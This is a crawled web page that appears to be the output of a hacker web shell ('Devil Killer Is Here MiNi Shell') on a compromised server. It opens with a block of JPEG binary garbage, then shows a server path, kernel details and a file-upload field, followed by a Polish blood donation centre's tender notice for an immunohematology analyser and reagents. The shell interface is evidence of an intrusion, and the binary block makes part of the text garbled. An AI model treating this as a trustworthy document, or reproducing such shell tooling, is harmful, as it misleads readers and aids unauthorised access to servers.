JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211215/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211215/0031603101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „ Dzierżawę analizatora do badań immunohematologicznych wraz z dostawą odczynników i materiałów eksploatacyjnych, dostawa odczynników <br/>i materiałów wykorzystywanych do badań immunohematologicznych” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">REGIONALNE CENTRUM KRWIODAWSTWA I KRWIOLECZNICTWA IM. DR KONRADA VIETHA W RADOMIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000303060</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">LIMANOWSKIEGO 42</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">483626276</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@rckik.radom.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rckik.radom.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „ Dzierżawę analizatora do badań immunohematologicznych wraz z dostawą odczynników i materiałów eksploatacyjnych, dostawa odczynników <br/>i materiałów wykorzystywanych do badań immunohematologicznych” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-979c50eb-5d30-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00316031</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00169412/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Odczynniki, krwinki, roztwory, materiały kontrolne i materiały zużywalne do badań immunohematologicznych wraz z dzierżawą analizatora i systemu back-up</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://rckik-radom.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://rckik-radom.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">format<br/>kwalifikowanego podpisu elektronicznego, jako:<br/>dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć oddzielny plik z podpisem.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">abi@rckik.radom.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-6/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I. Przedmiotem zamówienia jest dzierżawa w pełni zautomatyzowanego analizatora do badań immunohematologicznych wraz z systemem back-up oraz zakup odczynników i materiałów eksploatacyjnych niezbędnych do wykonywania badań w ilości podanej poniżej w ciągu dwóch lat.<br/>II. Zestawienie parametrów granicznych (bezwzględnie wymagane).<br/>1. Analizator zaopatrzony w zewnętrzny system podtrzymywania napięcia<br/>– UPS, komputer i drukarkę laserową.<br/>2. Analizator musi pracować w oparciu o technikę mikrotestów kolumnowych żelowych i wykonywać następujące badania serologiczne:<br/>a. badanie grupy krwi w układzie ABO i Rh D + rewers<br/>b. badanie przeglądowe na obecność przeciwciał odpornościowych w pośrednim teście<br/>antyglobulinowym (PTA-LISS) przy użyciu zestawu krwinek wzorcowych<br/>c. badanie przeglądowe na obecność przeciwciał odpornościowych w pośrednim teście<br/>antyglobulinowym (PTA-LISS) na krwinkach pulowanych,<br/>d. identyfikacja przeciwciał<br/>e. kontrola grupy krwi dawcy<br/>f. kontrola grupy krwi biorcy<br/>g. próby zgodności<br/>h. oznaczanie fenotypu Rh + K, np. C, c, E, e, K, Cw<br/>i. test D słabe<br/>3. Ilość próbek na pokładzie analizatora minimum 80.<br/>4. Wykonywanie badań z probówek o średnicy od 10-16 mm<br/>5. Akceptacja różnych systemów kodów kreskowych nie tylko ISBT 128<br/>6. Pozytywna identyfikacja badanych próbek i odczynników poprzez kody kreskowe zawierające numer serii i datę ważności<br/>7. System kontroli jakości dla poszczególnych modułów automatycznego analizatora (wirówki: kontrola prędkości wirowania, inkubatora: temperatura inkubacji, systemu pipetującego: objętość pipetowania) oraz odczynników.<br/>8. Kompletna rejestracja czynności operatora, użytych próbek badanych i odczynników (numery serii i daty ważności) oraz wykonanych testów.<br/>9. Zgłaszanie stanu alarmowego, jeśli ilość odczynników nie jest wystarczająca do<br/>wykonania zaplanowanych badań.<br/>10. Archiwizacja wyników badań (protokół badania i obraz bezpośredni).<br/>11. Możliwość ciągłego doładowywania próbek, odczynników, płynów<br/>eksploatacyjnych bez przerywania pracy analizatora.<br/>12. Automatyczne rozpoznawanie przez analizator skrzepów.<br/>13. Możliwość zdalnej diagnostyki systemu automatycznego analizatora.<br/>14. Rok produkcji analizatora- nie wcześniej niż 2016<br/>15. Zapewnienie programu, pozwalającego na automatyczną transmisję danych do programu<br/>„Bank Krwi”. Koszt podłączenia po stronie wykonawcy. W przypadku jego zamiany,<br/>wykonawca zobowiązuje się zapewnić nowy lub zaktualizować stary program.<br/>16. Wykonawca zobowiązuje się do dostarczenia również systemu back-up ; półautomatycznego lub manualnego; przeznaczonego do oferowanego analizatora, pracującego na tych samych materiałach/odczynnikach; składającego się z:<br/>- inkubatora z zegarem i sygnałem alarmowym na zakończenie inkubacji; wirówki ze wskaźnikiem czasu wirowania; pipety automatycznej z funkcją wielokrotnego dozowania i wyrzutem końcówki; materiałów eksploatacyjnych (końcówki do pipety) <br/>17. Wykonawca zobowiązuje się do dostarczenia wraz z urządzeniami instrukcji obsługi<br/>w języku polskim oraz całości dokumentacji technicznej niezbędnej do prawidłowego<br/>korzystania z urządzeń.<br/>18. Wykonawca zobowiązuje się do dostarczenia destylarki potrzebnej do otrzymywania wody destylowanej koniecznej do sporządzania roztworów myjących, płuczących (jeżeli te środki są w formie stężonej i wymagają rozcieńczania)<br/>19. Wykonawca zobowiązuje się do dostarczenia drukarki kodów kreskowych wraz z etykietami<br/>20. Przeszkolenie personelu podstawowego w zakresie obsługi, eksploatacji i konserwacji<br/>urządzenia oraz tzw. trenera mogącego szkolić innych.<br/><br/>III. Parametry jakościowe.<br/>L.p. Parametr	Ocena	Treść oferty<br/>1.	Czynności konserwująco-odkażające wymagane i wykonywane przez użytkownika:<br/>1x w miesiącu<br/>1x w tygodniu<br/>codziennie	<br/><br/>5 pkt.<br/>3 pkt.<br/>0 pkt.	<br/>2.	Analizator w 100% wykorzystujący mikrokolumny na kartach/ otwierający podczas badania pojedyncze kolumny	Tak: 10 pkt.<br/><br/>Nie: 0 pkt.	<br/>3.	Karty do oznaczeń grup krwi, kontroli grup krwi dawcy i biorcy zawierają kolumnę z kontrolą wewnętrzną<br/>	Tak: 10 pkt.<br/><br/>Nie: 0 pkt.	<br/>4.<br/>	Analizator z wbudowanymi 2 igłami/ramionami pipetującymi	Tak: 10 pkt.<br/><br/>Nie: 0 pkt.	<br/>5.	Dostępność pomocy technicznej (telefonicznie):<br/>7 dni w tygodniu<br/>Od poniedziałku do piątku<br/>Brak dostępności	<br/>5 pkt.<br/>3 pkt.<br/>0 pkt.	<br/><br/>Spełnienie wszystkich parametrów granicznych wymaganych w punkcie II jest<br/>warunkiem koniecznym. Jeżeli jakikolwiek z w/w parametrów nie będzie dostępny,<br/>oferta zostanie odrzucona jako niespełniająca SWZ.<br/><br/>IV. Warunki dostawy.<br/>1. Realizacja umowy na okres 24 miesięcy. Termin dostawy urządzenia wraz z podłączeniem systemu nie może być dłuższy niż 30 dni od podpisania umowy.<br/>2. Dostawa odczynników, materiałów zużywalnych i eksploatacyjnych będzie odbywała się<br/>przez 24 miesiące zgodnie z zamówieniami przesłanymi po podpisaniu umowy.<br/>3. Każda partia dostarczonych odczynników, materiałów musi posiadać znak CE i certyfikat<br/>jakości zawierający oznaczenie serii lub partii wyrobu, datę produkcji.<br/>4. Wykonawca ma obowiązek załączyć do każdej dostawy fakturę (oryginał) zawierającą<br/>dane zgodne z dostawą i umową oraz wskazanie numeru postępowania i datę zawarcia umowy.<br/>5. Zamawiający dopuszcza dostarczenie faktur oddzielnie niż dostawy, pod warunkiem, że<br/>faktury zostaną dostarczone do siedziby Zamawiającego tego samego dnia co planowana<br/>dostawa - w godzinach pracy magazynu 7:00 – 13:30.<br/>6. Zamówienie typu „cito” dostarczone będą do siedziby Zamawiającego w ciągu 72 godzin,<br/>w ilości nie przekraczającej tygodniowego zużycia.<br/>7. Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w<br/>ofercie, jednocześnie wskazuje, że ostateczna ilość zamówionego towaru nie może być<br/>mniejsza niż 70% wartości wskazanej w opisie przedmiotu zamówienia. Wykonawcy nie<br/>przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia<br/>zamówienia w powyżej wskazanym zakresie. Wykonawcy będzie przysługiwało jedynie<br/>wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie<br/>zmniejszenia ilości dostaw.<br/>8. Wykonawca oświadcza, że materiały medyczne i sprzęt jednorazowego użytku mający wpływ na jakość składników krwi dostarczone/transportowane będą do magazynu <br/>w nadzorowanych warunkach, w temperaturze zalecanej przez producenta.<br/>9. W przypadku zwłoki w dostarczeniu przedmiotu zamówienia od daty planowanej dostawy, Zamawiający zastrzega sobie prawo wykonania zastępczego – złożenia zamówienia u innego dostawcy, jednocześnie obciążając różnicą wynikającą z ceny zamówienia Wykonawcę. Zamawiający upoważniony jest do dokonania potrącenia z wynagrodzenia Wykonawcy z tytułu realizacji kolejnych dostaw.<br/><br/>V. Gwarancja.<br/>1. Analizator powinien być objęty terminem gwarancji przez cały czas obowiązywania<br/>umowy.<br/>2. Wykonawca udzieli minimum 6 miesięczny termin przydatności do użytku dla<br/>odczynników, materiałów zużywalnych i eksploatacyjnych od momentu dostarczenia<br/>danej partii do siedziby Zamawiającego (nie dotyczy krwinek wzorcowych, których termin przydatności wynosi co najmniej 4 tygodnie).<br/>3. Pełna gwarancja na urządzenie powinno obejmować naprawy lub wymiany każdego z elementów, podzespołów lub zespołów , które uległy uszkodzeniu – w miejscu<br/>instalacji urządzenia.<br/>4. W okresie gwarancji Wykonawca będzie wykonywał przeglądy techniczne analizatora co najmniej co 12 miesięcy lub zgodnie z wymaganiami producenta (wraz z zapewnieniem <br/>części zamiennych i materiałów eksploatacyjnych) w miejscu instalacji systemu.<br/>5. Czas reakcji serwisowej, to jest czas jaki upłynął pomiędzy zgłoszeniem awarii/usterki a przystąpieniem serwisanta do jej usuwania, nie będzie dłuższy niż 24 godziny od zgłoszenia awarii/usterki faksem lub mailem.<br/>6. W przypadku więcej niż 6 napraw w ciągu roku skutkujących przerwą w pracy – niewykonaniem planowym badań, Wykonawca zobowiązuje się dostarczyć nowy analizator. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696300-8 - Odczynniki chemiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">L.p. Parametr	Ocena<br/>1.	Czynności konserwująco-odkażające wymagane i wykonywane przez użytkownika:<br/>1x w miesiącu<br/>1x w tygodniu<br/>codziennie	<br/><br/>5 pkt.<br/>3 pkt.<br/>0 pkt.<br/>2.	Analizator w 100% wykorzystujący mikrokolumny na kartach/ otwierający podczas badania pojedyncze kolumny	Tak: 10 pkt.<br/><br/>Nie: 0 pkt.<br/>3.	Karty do oznaczeń grup krwi, kontroli grup krwi dawcy i biorcy zawierają kolumnę z kontrolą wewnętrzną<br/>	Tak: 10 pkt.<br/><br/>Nie: 0 pkt.<br/>4.<br/>	Analizator z wbudowanymi 2 igłami/ramionami pipetującymi	Tak: 10 pkt.<br/><br/>Nie: 0 pkt.<br/>5.	Dostępność pomocy technicznej (telefonicznie):<br/>7 dni w tygodniu<br/>Od poniedziałku do piątku<br/>Brak dostępności	<br/>5 pkt.<br/>3 pkt.<br/>0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> odczynniki, krwinki wzorcowe, materiały kontrolne i materiały zużywalne do badań konsultacyjnych. Materiały dedykowane do posiadanej linii Dia-Med ID: <br/>Wirówka DiaMed-ID-Centrifuge 24S, wirówka DiaCent-CW, czytnik do ID-Card, 4 ID-pipetory, dozownik ID-Dispenser Green .1. Dostawy realizowane będą przez 24 miesiące sukcesywnie wg zamówienia<br/>2. Termin ważności krwinek co najmniej 5 tygodni od daty dostawy<br/>3. Każda partia dostarczonych odczynników musi zawierać oznaczenia w języku polskim, posiadać znak CE, oznaczenie serii (w dostawie jedna seria danego odczynnika), datę ważności, świadectwo jakości, instrukcję stosowania w języku polskim. Końcówki do pipet muszą posiadać znak CE, oznaczenie serii.<br/>4. Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w<br/>ofercie, jednocześnie wskazuje, że ostateczna ilość zamówionego towaru nie może być<br/>mniejsza niż 70% wartości wskazanej w opisie przedmiotu zamówienia. Wykonawcy nie<br/>przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia<br/>zamówienia w powyżej wskazanym zakresie. Wykonawcy będzie przysługiwało jedynie<br/>wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie<br/>zmniejszenia ilości dostaw.<br/>5. Wykonawca oświadcza, że odczynniki i krwinki dostarczone/transportowane będą do magazynu w nadzorowanych warunkach, w temperaturze zalecanej przez producenta.<br/>6. Dotyczy pkt. 7 i 8 – Krwinki papainowane- dostawa 1 op. co 2 miesiące <br/>7. Dotyczy pkt. 9, 10, 11, 12 wymagane są karty do oznaczania 2 antygenów z kolumną kontrolną<br/>7. Dotyczy pkt.21 – wymagana jest kontrola zewnętrzna międzynarodowa<br/>8. Zamawiający dopuszcza zaoferowanie odczynników i kart innego producenta, pod warunkiem udowodnienia kompatybilności oferowanych odczynników z posiadaną linią Dia-Med przez producenta odczynników oraz producenta linii Dia-Med ID. W takim przypadku razem z ofertą należy złożyć opinię producenta odczynników oraz opinię producenta mikrometody DiaMed o zgodności działania oferowanych odczynników z posiadanymi przez Zamawiającego urządzeniami </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Krwinki do bezpośredniego zastosowania w metodzie mikrokolumnowej DiaHem:<br/>TAK- 10 pkt.<br/>NIE – 0 pkt.<br/><br/>2.	Odczynniki wykrywają antygen o słabej ekspresji:<br/><br/>TAK- 10 pkt.<br/>NIE – 0 pkt.<br/><br/>Termin płatności- 20 pkt.<br/>Do 30 dni -10 pkt<br/>Od 31 do 60 dni – 20 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie precyzuje przedmiotowego warunku.<br/>Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie precyzuje przedmiotowego warunku.<br/>Sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie precyzuje przedmiotowego warunku.<br/> Zdolności technicznej lub zawodowej:<br/>Zamawiający nie precyzuje przedmiotowego warunku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym 